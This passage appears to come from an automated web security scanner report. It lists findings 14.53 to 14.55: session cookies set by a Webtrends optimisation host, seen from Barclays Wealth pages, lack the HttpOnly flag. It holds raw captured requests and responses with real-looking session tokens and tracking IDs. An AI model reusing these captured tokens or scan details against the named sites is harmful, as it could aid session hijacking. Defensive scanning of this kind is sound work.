Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=27DB104FF240B21CA30EC91928AC60D3; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93201f611e1; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A41F4D7EB85977B26917F3C61E7ED309; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; Expires=Sun, 01-Jan-2012 00:03:06 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=018ce995; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e932031ed775; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.53. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.54. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff4fedf75c954072310e47bb718171cc3f6008bbb3a666ef26bc4658dabae0475615acfb8070f584d93ecd6e9fc7bedbdc1c12c3839d265f1df0cb8e31d62de3980d6fc3b5ec52a8247b8d3fcadff665f1773943fda08486923a9d1c5b14c46941ec600deca53c60e5548a7c9d4ce75bf3bfe7f64cdbe26692916675d494d0c21072c9133d4a407a24bb7c26880f0a981ff62c1d8577075faf26f1e0ade3e25b044f29f7e8d35addf752a63b80822f0e896d8f67ccf9e456e61238d3b7b4f14177ed5ac04ae72e54672a802b5d313e24752101fa43dec67703b2571c112c4918e5a6b44e0318425bb7839b04a79f146fcc93c99059bf7a5ecb80619f01fea63f29e6b344acbf093410c24a049160b3a119b5364c4ff4c768b8dd0d676e841291103df9c684b20c8251f1a1648c56f6f1476f76864a83c1da3f9f3800b689474f7642b056b057dbcb6e6da68d37d7eb05f930517bfeb2d66f747d58038d4c84c29e1cf40c0da735b5d723462fa33f6b18d80c01b3d04a1849fa67f1535d968cb5dc708a15aac4e706b9b713e15e5d285e2014f212a89767d4fe06cfb32ea85cf890d6dfbef74acb3fc367cea30e94038de3e1aa79384996ca8d054b729af1dbc2811c10c56f309fc18d1c165153941337825e63b7886fdebf070bf3c03ea3cf931cd2948b5ec79e42a1461446d88c1c2e1ff926d5e648555470eb34605189cba34d9a181e0d48ace7ef0afc9aad3417df53fb0c6c20056b7158709123e0a70dab3c9d340cd934928602a0d59a59c912e17ce64d7385ffef35bf75d7fd346c1f4c2da44855532b188f6307dbd919984cba3d3b971aa64a1c127b788d732876b4cbbd60eb28d4f6ba9603a31a456007f91b8f028dfc40e9ba794cef21882b3eb4d61e60643b4bea91c33aa91d4e580d80e69530bed07dd40569e7f92e4eee0f990ec55cacd5cf278c1ae9ab88f56354f950069a039579aaddfcec2b65a02d43a2b6bd1e098c692f758628befd10bbdc96885daa234f53e588c036f1cbba8e5b95961a90114cfaeaad2d7e46127fb4a96e22ce5a05f2741679ac444364f6ca562a3c6b5809a253b832c4fd16c3276951b57e4e7a44a4bc522fcbac78d5716cd8eaf820201a06db34ab081bdc8f1b78ca9a56e9995dcc3c648c793effe44bd6995bdbcf0206e5af8b6f683146c8ad5b8e278391efcc39aa9f482905058c1e5a01ef47377bd6efcae4c705d7fcb7c0a81067ab8dc3477eaf5b84175e25f26e8e83c3994e57e8981019e56e79f150db5afbcf7f5922bcf832d3e2daf701a0ea937d2e248995f29e8ce7bb57f97748c2b6943e36683773909253b2d797d2db27de8028d825ef24a33a9c15e306ce3eff2cd0c9c9c17a5283a42701a007474e46d8a3f14921a63bd99b324cfac806865fe2c48c3d64e9b0eb8bb307e59fd75d2a8763fadede9ca07b1de9269fa780b69b58c3447992fa4e6c86bc4c6de7228088ffd2c0d624540c42a27ef980006ee1c2  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff4fedf75c954072310e47bb718171cc3f6008bbb3a666ef26bc4658dabae0475615acfb8070f584d93ecd6e9fc7bedbdc1c12c3839d265f1df0cb8e31d62de3980d6fc3b5ec52a8247b8d3fcadff665f1773943fda08486923a9d1c5b14c46941ec600deca53c60e5548a7c9d4ce75bf3bfe7f64cdbe26692916675d494d0c21072c9133d4a407a24bb7c26880f0a981ff62c1d8577075faf26f1e0ade3e25b044f29f7e8d35addf752a63b80822f0e896d8f67ccf9e456e61238d3b7b4f14177ed5ac04ae72e54672a802b5d313e24752101fa43dec67703b2571c112c4918e5a6b44e0318425bb7839b04a79f146fcc93c99059bf7a5ecb80619f01fea63f29e6b344acbf093410c24a049160b3a119b5364c4ff4c768b8dd0d676e841291103df9c684b20c8251f1a1648c56f6f1476f76864a83c1da3f9f3800b689474f7642b056b057dbcb6e6da68d37d7eb05f930517bfeb2d66f747d58038d4c84c29e1cf40c0da735b5d723462fa33f6b18d80c01b3d04a1849fa67f1535d968cb5dc708a15aac4e706b9b713e15e5d285e2014f212a89767d4fe06cfb32ea85cf890d6dfbef74acb3fc367cea30e94038de3e1aa79384996ca8d054b729af1dbc2811c10c56f309fc18d1c165153941337825e63b7886fdebf070bf3c03ea3cf931cd2948b5ec79e42a1461446d88c1c2e1ff926d5e648555470eb34605189cba34d9a181e0d48ace7ef0afc9aad3417df53fb0c6c20056b7158709123e0a70dab3c9d340cd934928602a0d59a59c912e17ce64d7385ffef35bf75d7fd346c1f4c2da44855532b188f6307dbd919984cba3d3b971aa64a1c127b788d732876b4cbbd60eb28d4f6ba9603a31a456007f91b8f028dfc40e9ba794cef21882b3eb4d61e60643b4bea91c33aa91d4e580d80e69530bed07dd40569e7f92e4eee0f990ec55cacd5cf278c1ae9ab88f56354f950069a039579aaddfcec2b65a02d43a2b6bd1e098c692f758628befd10bbdc96885daa234f53e588c036f1cbba8e5b95961a90114cfaeaad2d7e46127fb4a96e22ce5a05f2741679ac444364f6ca562a3c6b5809a253b832c4fd16c3276951b57e4e7a44a4bc522fcbac78d5716cd8eaf820201a06db34ab081bdc8f1b78ca9a56e9995dcc3c648c793effe44bd6995bdbcf0206e5af8b6f683146c8ad5b8e278391efcc39aa9f482905058c1e5a01ef47377bd6efcae4c705d7fcb7c0a81067ab8dc3477eaf5b84175e25f26e8e83c3994e57e8981019e56e79f150db5afbcf7f5922bcf832d3e2daf701a0ea937d2e248995f29e8ce7bb57f97748c2b6943e36683773909253b2d797d2db27de8028d825ef24a33a9c15e306ce3eff2cd0c9c9c17a5283a42701a007474e46d8a3f14921a63bd99b324cfac806865fe2c48c3d64e9b0eb8bb307e59fd75d2a8763fadede9ca07b1de9269fa780b69b58c3447992fa4e6c86bc4c6de7228088ffd2c0d624540c42a27ef980006ee1c2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff4fedf75c954072310e47bb718171cc3f6008bbb3a666ef26bc4658dabae0475615acfb8070f584d93ecd6e9fc7bedbdc1c12c3839d265f1df0cb8e31d62de3980d6fc3b5ec52a8247b8d3fcadff665f1773943fda08486923a9d1c5b14c46941ec600deca53c60e5548a7c9d4ce75bf3bfe7f64cdbe26692916675d494d0c21072c9133d4a407a24bb7c26880f0a981ff62c1d8577075faf26f1e0ade3e25b044f29f7e8d35addf752a63b80822f0e896d8f67ccf9e456e61238d3b7b4f14177ed5ac04ae72e54672a802b5d313e24752101fa43dec67703b2571c112c4918e5a6b44e0318425bb7839b04a79f146fcc93c99059bf7a5ecb80619f01fea63f29e6b344acbf093410c24a049160b3a119b5364c4ff4c768b8dd0d676e841291103df9c684b20c8251f1a1648c56f6f1476f76864a83c1da3f9f3800b689474f7642b056b057dbcb6e6da68d37d7eb05f930517bfeb2d66f747d58038d4c84c29e1cf40c0da735b5d723462fa33f6b18d80c01b3d04a1849fa67f1535d968cb5dc708a15aac4e706b9b713e15e5d285e2014f212a89767d4fe06cfb32ea85cf890d6dfbef74acb3fc367cea30e94038de3e1aa79384996ca8d054b729af1dbc2811c10c56f309fc18d1c165153941337825e63b7886fdebf070bf3c03ea3cf931cd2948b5ec79e42a1461446d88c1c2e1ff926d5e648555470eb34605189cba34d9a181e0d48ace7ef0afc9aad3417df53fb0c6c20056b7158709123e0a70dab3c9d340cd934928602a0d59a59c912e17ce64d7385ffef35bf75d7fd346c1f4c2da44855532b188f6307dbd919984cba3d3b971aa64a1c127b788d732876b4cbbd60eb28d4f6ba9603a31a456007f91b8f028dfc40e9ba794cef21882b3eb4d61e60643b4bea91c33aa91d4e580d80e69530bed07dd40569e7f92e4eee0f990ec55cacd5cf278c1ae9ab88f56354f950069a039579aaddfcec2b65a02d43a2b6bd1e098c692f758628befd10bbdc96885daa234f53e588c036f1cbba8e5b95961a90114cfaeaad2d7e46127fb4a96e22ce5a05f2741679ac444364f6ca562a3c6b5809a253b832c4fd16c3276951b57e4e7a44a4bc522fcbac78d5716cd8eaf820201a06db34ab081bdc8f1b78ca9a56e9995dcc3c648c793effe44bd6995bdbcf0206e5af8b6f683146c8ad5b8e278391efcc39aa9f482905058c1e5a01ef47377bd6efcae4c705d7fcb7c0a81067ab8dc3477eaf5b84175e25f26e8e83c3994e57e8981019e56e79f150db5afbcf7f5922bcf832d3e2daf701a0ea937d2e248995f29e8ce7bb57f97748c2b6943e36683773909253b2d797d2db27de8028d825ef24a33a9c15e306ce3eff2cd0c9c9c17a5283a42701a007474e46d8a3f14921a63bd99b324cfac806865fe2c48c3d64e9b0eb8bb307e59fd75d2a8763fadede9ca07b1de9269fa780b69b58c3447992fa4e6c86bc4c6de7228088ffd2c0d624540c42a27ef980006ee1c2 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D04074B23F5A36B7B29BA0731F53ABEE; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=fcdcc722e932031ed775

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6FBCA80F75E0528A929525FF0B85D1D0; Path=/ots
Set-Cookie: _wt.mode-79569=e1f36dbd085f0041d284; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; Expires=Sun, 01-Jan-2012 00:03:13 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.55. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c893c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c893c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6

Issue detail

